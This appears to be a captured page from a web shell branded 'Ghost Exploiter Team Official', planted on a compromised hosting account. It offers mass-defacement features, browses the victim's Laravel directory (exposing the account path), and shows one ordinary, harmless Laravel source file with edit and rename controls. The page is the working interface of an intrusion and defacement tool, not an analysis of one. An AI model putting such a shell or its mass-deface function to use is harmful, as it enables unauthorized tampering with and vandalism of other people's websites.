webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Broadcasting
/
Broadcasters
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
AblyBroadcaster.php
6.331KB
edt
ren
Broadcaster.php
10.805KB
edt
ren
LogBroadcaster.php
1.059KB
edt
ren
NullBroadcaster.php
0.451KB
edt
ren
PusherBroadcaster.php
5.535KB
edt
ren
RedisBroadcaster.php
4.319KB
edt
ren
UsePusherChannelConvent
...
0.802KB
edt
ren
<?php namespace Illuminate\Broadcasting\Broadcasters; use Illuminate\Support\Str; trait UsePusherChannelConventions { /** * Return true if the channel is protected by authentication. * * @param string $channel * @return bool */ public function isGuardedChannel($channel) { return Str::startsWith($channel, ['private-', 'presence-']); } /** * Remove prefix from channel name. * * @param string $channel * @return string */ public function normalizeChannelName($channel) { foreach (['private-encrypted-', 'private-', 'presence-'] as $prefix) { if (Str::startsWith($channel, $prefix)) { return Str::replaceFirst($prefix, '', $channel); } } return $channel; } }
<=Back
Liking